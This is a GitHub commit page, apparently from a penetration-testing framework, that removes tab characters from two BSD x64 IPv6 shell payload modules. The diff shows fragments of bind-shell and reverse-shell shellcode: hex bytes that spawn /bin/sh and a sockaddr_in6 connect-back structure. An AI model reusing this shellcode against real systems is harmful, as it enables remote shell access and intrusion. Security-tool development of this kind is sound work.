Skip to content

Commit 0b580ac

Browse files
committed
\t removed
1 parent a0539cd commit 0b580ac

File tree

2 files changed

+3
-3
lines changed

2 files changed

+3
-3
lines changed

modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -69,7 +69,7 @@ def initialize(info = {})
6969
"\x0f\x05" +# syscall #
7070
"\x52" +# push %rdx #
7171
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
72-
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
72+
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
7373
"\x57" +# push %rdi #
7474
"\x48\x89\xe7" +# mov %rsp,%rdi #
7575
"\x52" +# push %rdx #

modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -53,7 +53,7 @@ def initialize(info = {})
5353
"\x04\x58" +# add $0x58,%al #
5454
"\x0f\x05" +# syscall #
5555
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
56-
# back:
56+
# back:
5757
"\x5e" +# pop %rsi #
5858
"\x6a\x1c" +# pushq $0x1c #
5959
"\x5a" +# pop %rdx #
@@ -72,7 +72,7 @@ def initialize(info = {})
7272
"\x0f\x05" +# syscall #
7373
# forth:
7474
"\xe8\xd8\xff\xff\xff" +# callq <back> #
75-
# sockaddr_in6
75+
# sockaddr_in6
7676
"\x00\x1c\x11\x5c" +# AF_INET6+port #
7777
"\x00\x00\x00\x00" +# no-one-cares #
7878
"\x00\x00\x00\x00" +# IPv6- #

0 commit comments

Comments
 (0)